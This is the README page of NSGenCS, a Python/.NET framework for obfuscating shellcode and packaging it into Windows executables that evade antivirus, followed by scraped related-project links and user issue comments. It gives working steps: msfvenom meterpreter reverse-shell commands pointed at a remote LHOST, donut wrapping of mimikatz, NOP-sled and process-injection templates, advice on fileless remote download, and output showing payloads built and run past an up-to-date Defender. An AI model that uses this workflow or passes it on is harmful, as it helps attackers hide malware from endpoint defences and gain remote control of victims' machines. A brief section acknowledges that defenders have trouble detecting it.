Extendable payload obfuscation and delivery framework

Overview

NSGenCS

What Is?

An extremely simple, yet extensible framework to evade AV with obfuscated payloads under Windows.

Installation Requirements

Currently only runs under Windows

Python3

.NET (dependencies required vary on delivery templates)

Running

Simple method :

python NSGenCS.py file <payload> -method <Obfuscation Method> -key <encryption/decryption key if required>

Should generate payload.exe

Options

Option Usage Default
-file C# file with byte[] buf NOTE if you see errors, please check the variable is called buf and not my_buf (from Donut) for example Req'd
-key Key for payload encryption/decryption (example: 0xff) NOTE no validation is done on key value false
-method Payload encryption method folder name (currently xor and reverse) Req'd
-template Delivery Template Directory for inserting payload and decryption into APC_Inj_New
-shellcode Shellcode Template Directory for shellcode modification file ShellcodeTemplate
-out Output Filename Payload.exe
-h Show help file

How do?

This is a two-stage process. The first takes your input file and obfuscates it according to your chosen method. Initially I have implemented two simple ones, the idea is that this will be an extensible framework that gives you the ability to customise it to your heart's content.

If we look at the two simple methods, xor and reverse, both folders contain an encrypt.txt and a decrypt.txt. These are C# files that contain the transformations that you wish to apply to your code. In the case of reverse this is just Array.Reverse(buf); These can be as complicated or as simple as you wish.

For the XOR method, a key is required with which to XOR the input file which is passed on the command line.

These code snippets and placed in the ShellcodeTemplate which will then output your modified code ready to pass to the delivery template.

The modified code is placed in the delivery template along with the instructions from decrypt.txt which is then compiled and your payload generated. You can create a template that uses syscalls for example, package it with DInvoke and Fody, change the process you inject into, change the entire delivery method from process injection for example.

You have complete freedom to create new delivery templates and new payload obfuscation methods

Templates

To show how easy it is to modify templates, I borrowed the templates from pwndizzle (https://github.com/pwndizzle/c-sharp-memory-injection).

Modifications took less than a minute :

  1. Download existing template to its own folder, rename it to template and add the payload.csproj to the folder. 9 times out of 10 you can just copy an existing payload.csproj from one of the exiting templates, however if your delivery template has sopecifc requirements such as System.EnterpriseServices then some configuration will be required. The folder name will become the parameter you pass via -template

image

  1. Open the template file and locate where current shellcode is stored :

image

  1. Note that in this case the shellcode is stored in a variable called payload
  2. Search and replace payload with buf (please see notes below)
  3. Delete current payload
  4. Add SHELLCODEHERE and DECRYPTHERE

image

That's it! Now compile it remembering to use -template followed by the folder name you installed the new template into. I used the output from c:\metasploit-framework\bin\msfvenom.bat -p windows/x64/meterpreter/reverse_tcp -f csharp LPORT=4444 LHOST=192.168.1.84 -o meterpreter.cs

Now you have to understand what your delivery template is doing, and it's requirements. For example the Thread_hijack takes a command line parameter for the process you wish to inject into - I used notepad in this example. Let's see how it gets on with a fully patched and upto date Windows 10 with Defender :

image

Perfect!

You can extend the existing templates or add your own in their own folder to include other defensive measures if you want.

Encrypt/Decrypt

The two simple examples used don't really show the extensibility of the framework. Want to prepend code to your shellcode? This is where you can do it.

You could even add code for in-memory decryption. Use the encrypt file to generate to encrypted payload and use decrypt to add some in memory decryption code at the beginning of the payload you are looking to inject. Alternatively add it before the transform in the encrypt function and let decrypt only perform decryption.

A simple example of how to add a 1000 byte NOP sled before your payload is included in the NOPSled method:

    		Array.Reverse(buf);
		Array.Resize(ref buf, (buf.Length) + 1000);
		Array.Reverse(buf);
		for (int j = 0; j < 1000 ; j++)
                {
                    buf[j] = (byte)((uint) 0x90);
                }

If you want to use AES encryption or the like, make sure that you ensure that you add the appropriate using to the necessary files such as using System.Security.Cryptography;. You can use KEYHERE and -key for a static key or even key it to a hostname or something if you want to use a more targeted approach.

There is a DLL Injection template provided, however this doesn't take a payload as such, it takes a filename. I haven't modified this template to take the parameters from any of the methods, it's left as is so you can experiment with it. You don't need SHELLCODEHERE, ENCRYPTHERE or DECRYPTHERE, you just need to pass a string to it. You could just replace line 74 with string dllName = "KEYHERE";. Create a new obfuscation method called 'Filename' and have blank encrypt and decrypt files. Or something like that - have a play :)

Want to do fileless? Just have an empty SHELLCODEHERE and use decrypt to create a download function to grab your payload from a remote host (or over SMB if you want). Again make sure that your delivery template has the appropriate using xxxxxxxxxx.

It really is limited only by your imagination.

Donut

You can also use the awesome donut framework (https://github.com/TheWover/donut) to create payloads for use with the framework such as mimikatz :

donut -a 2 -f 7 -z 2 file.exe will generate a loader.cs that you can use - PLEASE CHANGE THE VARIABLE NAME FROM my_buf to buf!!

You can deliver nearly anything using a combination of donut and NSGenCS. donut is the closest framework to magic as far as I can tell. Want to deliver a tool that is detected but not a shellcode/beacon? Go for it - drop it using this framework and the donut loader.cs. Just make sure you use a delivery template that supports console out if you need it and specify any command line options you require (such as an output file if you don't have a template that supports console output) using the -p"my command line options here" flag in donut.

Pointless Functionality (Triggers AV Currently)

Also supplied is the PE_Load template adopted from Casey Smith's (@subTee) and a utility called PE2CS. The PE_LOAD template triggers Defender so use with caution!

image

Want to reflectively load a PE file? Well now you can if you need to.

It's as simple as just PE2CS inputfile.exe > outputfile.cs and use the outputfile.cs as your C# input file.

Hopefully this shows how you can use templates from all sorts of different projects, drop them in this framework and with a few minor adjustments, you're good to go.

PE2CS

The included utility PE2CS will also convert any raw shellcode into the correct format to use with NSGENCS. Here we take the raw output from MSFVenom and parse it using PE2CS:

C:\Tools\NSGenCS>c:\metasploit-framework\bin\msfvenom.bat -p windows/x64/messagebox TEXT=NSGENCS TITLE=NSGENCS -f raw > msgbox.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 283 bytes


C:\Tools\NSGenCS>pe2cs msgbox.bin > msgbox.cs

C:\Tools\NSGenCS>python NSGenCS.py -file msgbox.cs -method xor -key 0x55 -out p3.exe



███╗   ██╗███████╗ ██████╗ ███████╗███╗   ██╗ ██████╗███████╗
████╗  ██║██╔════╝██╔════╝ ██╔════╝████╗  ██║██╔════╝██╔════╝
██╔██╗ ██║███████╗██║  ███╗█████╗  ██╔██╗ ██║██║     ███████╗
██║╚██╗██║╚════██║██║   ██║██╔══╝  ██║╚██╗██║██║     ╚════██║
██║ ╚████║███████║╚██████╔╝███████╗██║ ╚████║╚██████╗███████║
╚═╝  ╚═══╝╚══════╝ ╚═════╝ ╚══════╝╚═╝  ╚═══╝ ╚═════╝╚══════╝

NS Payload Encryptor by @bb_hacks                                                                                       

> Creating encoded shellcode from CS file
> Generating payload
> Cleanup
Microsoft (R) Build Engine version 16.10.2+857e5a733 for .NET
Copyright (C) Microsoft Corporation. All rights reserved.

  Determining projects to restore...
  Restored C:\Tools\NSGenCS\APC_Inj_New\Payload.csproj (in 94 ms).
  Payload -> C:\Tools\NSGenCS\APC_Inj_New\bin\Release\net45\win10-x64\Payload.exe
  Payload -> C:\Tools\NSGenCS\APC_Inj_New\bin\Release\net45\win10-x64\publish\
        1 file(s) copied.

You should see p3.exe now

C:\Tools\NSGenCS>p3.exe

image

Simples!

No work :(

There is a Troubleshooting.md in the root of this repositiory that contains common issues that people encounter and how to resolve them. If your issue is not documented here, please raise an issue and I will try and find a solution for you.

Notes

Templates are provided just to give you an idea of how easy it is to modify existing templates or write your own.

Please don't raise issues because Thread_Hijack doesn't play nicely with stageless Meterpreter or something! Understand the template you are using and how it interacts with the target system and your payload. I will close them and you will be sad.

Equally please don't raise an issue if your new delivery template doesn't compile because of the .csproj. Look at my code - do I look like I will be able to fix the problem? I'm barely scraping by here :)

Understand your target environment - don't use a Meterpreter payload on a system that does in memory scanning for example. It will fail. And you will be sad.

You will also be sad if you just run payload.exe notepad all the time if there isn't a notepad instance running.

If you don't clean up a lot of the ConsoleWriteLines in the provided templates, you are going to be extremely noisy. This too will make you sad.

If you don't rename the shellcode variable to buf (for example Donut outputs the file with my_buf as the variable) then you will see lots of red error messages when running NSGenCS. This will make you sad also. It will probably look something like this:

image

Guess what - if you use a delivery template that uses ResumeThread with Mimikatz and Defender, you will be sad.

Don't be sad.

This framework has been successfully tested with multiple delivery templates allowing bypasses of multiple AV and EDR endpoints. Please feel free to add templates and methods, I would love to see this become a community supported project. I would definitely not be sad if that happened.

TO-DO

Check that the payload file variable is buf & do regex witchcraft to replace it if not. Some templates already use the buf so ideally, in v2 it can be worked to use a unique variable name.

Check if encrypt/decrypt files have a KEYHERE placeholder and alert/break if -key not supplied

~~Add a -noclean switch to not clean up after execution for debugging purposes

Organise payloads and templates into their own folders for neatness

Bit more error checking and breaks if things go sad

Blue Team

Since the payloads and templates vary so much and templates can be grabbed from anywhere, I have struggled to come up with a good way of detecting this. The framework isn't the thing to trigger on, it will be the methodology employed by the template. I strongly suggest that behavioural detection will be the best way to get visibility of these payloads executing in your environment, but if there are ideas on how to help out #TeamBlue then please let me know and I can up date this file. In memory scanning will pick up things like Meterpreter but if you are using a payload that supports in memory obfuscation - well it's really tough.

Credits

@mhaskar for so much work cleaning the code up. I am not a good/clean/organised/competent coder, before he got his hands on my code it looked like an accident in an alphabet soup factory.

https://github.com/TheWover/donut for such an incredible tool

https://github.com/smokeme/payloadGenerator for the inspiration and base code - I just couldn't get it working with the .NET dependencies which was my fault, so created this instead

https://github.com/pwndizzle/c-sharp-memory-injection for the example templates

You might also like...
Python script that sends CVE-2021-44228 log4j payload requests to url list

scan4log4j Python script that sends CVE-2021-44228 log4j payload requests to url list [VERY BETA] using Supply your url list to urls.txt Put your payl

Dumps the payload.bin image found in Android update images.
Dumps the payload.bin image found in Android update images.

payload dumper Dumps the payload.bin image found in Android update images. Has significant performance gains over other tools due to using multiproces

PyFUD - Fully Undetectable payload generator for metasploit

PyFUD fully Undetectable payload generator for metasploit Usage: pyfud.py --host

Dependency Combobulator is an Open-Source, modular and extensible framework to detect and prevent dependency confusion leakage and potential attacks.

Dependency Combobulator Dependency Combobulator is an Open-Source, modular and extensible framework to detect and prevent dependency confusion leakage

labsecurity is a framework and its use is for ethical hacking and computer security
labsecurity is a framework and its use is for ethical hacking and computer security

labsecurity labsecurity is a framework and its use is for ethical hacking and computer security. Warning This tool is only for educational purpose. If

An open-source post-exploitation framework for students, researchers and developers.
An open-source post-exploitation framework for students, researchers and developers.

Questions? Join the Discord support server Disclaimer: This project should be used for authorized testing or educational purposes only. BYOB is an ope

Script for automatic dump and brute-force passwords using Volatility Framework
Script for automatic dump and brute-force passwords using Volatility Framework

Volatility-auto-hashdump Script for automatic dump and brute-force passwords using Volatility Framework

Phoenix Framework is an environment for writing, testing and using exploit code.
Phoenix Framework is an environment for writing, testing and using exploit code.

Phoenix Framework is an environment for writing, testing and using exploit code. 🖼 Screenshots 🎪 Community PwnWiki Forums 🔑 Licen

Comments
  • Unhandled Exception when using Thread_Hijack template

    Unhandled Exception when using Thread_Hijack template

    Hi,

    Environment: Windows 10 x64 Python 3.10.2 .NET SDKs installed: 6.0.201 [C:\Program Files\dotnet\sdk]

    Steps to reproduce the error

    Unhandled Exception: System.IndexOutOfRangeException: Index was outside the bounds of the array. at ThreadHijack.Main(String[] args)

    1. Use msfvenom to create a .cs file msfvenom -p windows/x64/meterpreter/reverse_tcp -f csharp LPORT=4444 LHOST=x.x.x.x -o meterpreter.cs

    2. The template file in the Thread_Hijack directory appeared to be modified already. When I searched for payload it was not found in the file.

    3. Ran the following python3 NSGenCS.py -file meterpreter.cs -method xor -key 0xbb -template Thread_Hijack

    > Creating encoded shellcode from CS file
    > Generating payload
    > Cleanup
    Microsoft (R) Build Engine version 17.1.0+ae57d105c for .NET
    Copyright (C) Microsoft Corporation. All rights reserved.
    
      Determining projects to restore...
      Restored C:\Users\mark\pentest\NSGenCS\Thread_Hijack\Payload.csproj (in 212 ms).
      Payload -> C:\Users\mark\pentest\NSGenCS\Thread_Hijack\bin\Release\net45\win10-x64\Payload.exe
      Payload -> C:\Users\mark\pentest\NSGenCS\Thread_Hijack\bin\Release\net45\win10-x64\publish\
            1 file(s) copied.
    
    If you didn't see a bunch of red lines before this message, you should see payload.exe now :)
    
    C:\Users\mark\pentest\NSGenCS>payload.exe notepad
    
    Unhandled Exception: System.IndexOutOfRangeException: Index was outside the bounds of the array.
       at ThreadHijack.Main(String[] args)
    
    opened by marksowell 0
  • Linux support

    Linux support

    This updates the code to handle paths and file operations in a more OS-independent manner. I deliberately did not refactor too deeply and tried to keep the general style intact. It's not the most elegant per se, but it should allow compiling payloads on a Linux host.

    It adds a new argument to optionally fix the project file's target framework moniker which makes support for Linux easier than modifying them manually (the available argument choices are taken directly from the Microsoft site). There may be other means of achieving this end directly via dotnet core but I've not investigated any further.

    More details are in the Linux.md file.

    Disclaimer... I've not extensively tested as this was a modification done this afternoon in order to suit my use case.

    opened by nomuus 1
Owner
null
Industry ready custom API payload with an easy format for building Python APIs (Django/Django Rest Framework)

Industry ready custom API payload with an easy format for building Python APIs (Django/Django Rest Framework) Yosh! If you are a django backend develo

Abram (^o^) 7 Sep 30, 2022
HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

EntySec 100 Dec 23, 2022
Malware Configuration And Payload Extraction

CAPEv2 (Python3) has now been released CAPEv2 With the imminent end-of-life for Python 2 (January 1 2020), CAPEv1 will be phased out. Please upgrade t

Context Information Security 701 Dec 27, 2022
Malware Configuration And Payload Extraction

CAPE: Malware Configuration And Payload Extraction CAPE is a malware sandbox. It is derived from Cuckoo and is designed to automate the process of mal

Kevin O'Reilly 1k Dec 30, 2022
macOS Initial Access Payload Generator

Mystikal macOS Initial Access Payload Generator Related Blog Post: https://posts.specterops.io/introducing-mystikal-4fbd2f7ae520 Usage: Install Xcode

Leo Pitt 206 Dec 31, 2022
对安卓APP注入MSF PAYLOAD,并且对手机管家进行BYPASS。

520_APK_HOOK 介绍 将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。 项目地址: https://github.com/cleverbao/520apkhook 作者: BaoGuo 优点 相比于原始的msf远控,此版本ap

BaoGuo 368 Jan 2, 2023
Tool To generate Stable Undetected Payload

windowsPayload Tool To generate Stable Undetected Payload Don t Upload to Virus Total :) Follow on Social Media Platforms ScreenShots How to install +

youhacker55 117 Dec 30, 2022
proxyshell payload generate

Py Permutative Encoding https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-pst/5faf4800-645d-49d1-9457-2ac40eb467bd Generate proxyshell

Evi1cg 63 Nov 15, 2022
RCE 0-day for GhostScript 9.50 - Payload generator

RCE-0-day-for-GhostScript-9.50 PoC for RCE 0-day for GhostScript 9.50 - Payload generator The PoC in python generates payload when exploited for a 0-d

null 534 Dec 14, 2022
Ducky Script is the payload language of Hak5 gear.

Ducky Script is the payload language of Hak5 gear. Since its introduction with the USB Rubber Ducky in 2010, Ducky Script has grown in capability while maintaining simplicity. Aided by Bash for logic and conditional operations, Ducky Script provides multi-vector functions for all Hak5 payload platforms.

Abir Abedin Khan 6 Oct 7, 2022